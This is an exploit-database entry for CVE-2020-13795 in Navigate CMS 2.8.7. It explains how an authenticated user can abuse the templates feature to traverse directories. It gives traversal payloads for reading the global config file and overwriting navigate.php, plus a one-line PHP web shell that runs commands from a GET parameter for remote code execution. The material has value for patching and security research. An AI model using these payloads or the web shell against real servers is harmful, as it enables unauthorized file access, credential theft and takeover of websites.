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Navigate CMS 2.8.7 - Authenticated Directory Traversal Vulnerability
# Exploit Title: Navigate CMS 2.8.7 - Authenticated Directory Traversal # Exploit Author: Gus Ralph # Vendor Homepage: https://www.navigatecms.com/en/home # Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.8.7r1401.zip/download # Version: 2.8.7 # Tested on: Ubuntu # CVE: CVE-2020-13795 A malicious user can abuse the authenticated templates functionality to traverse out of the templates directory to read and write to any file on the webserver as www-data. For this vulnerability, I looked into the "templates" feature of the application. It seems we can edit any file in the application's templates directory, for example: `/var/www/html/navigate/private/1/templates/` My initial thought was to traverse out of the current directory and read the global config file (located at `/var/www/html/navigate/cfg/globals.php`). My payload would then consist of creating a template, setting the path to be `/var/www/html/navigate/private/1/templates/../../../cfg/globals.php` Furthermore, this can be abused to write to a PHP file and gain RCE on the remote server, for example: Traversal payload: `../../../navigate.php` PHP Code execution payload: ``` <?php system($_GET['cmd']); ?> ``` # 0day.today [2025-01-06] #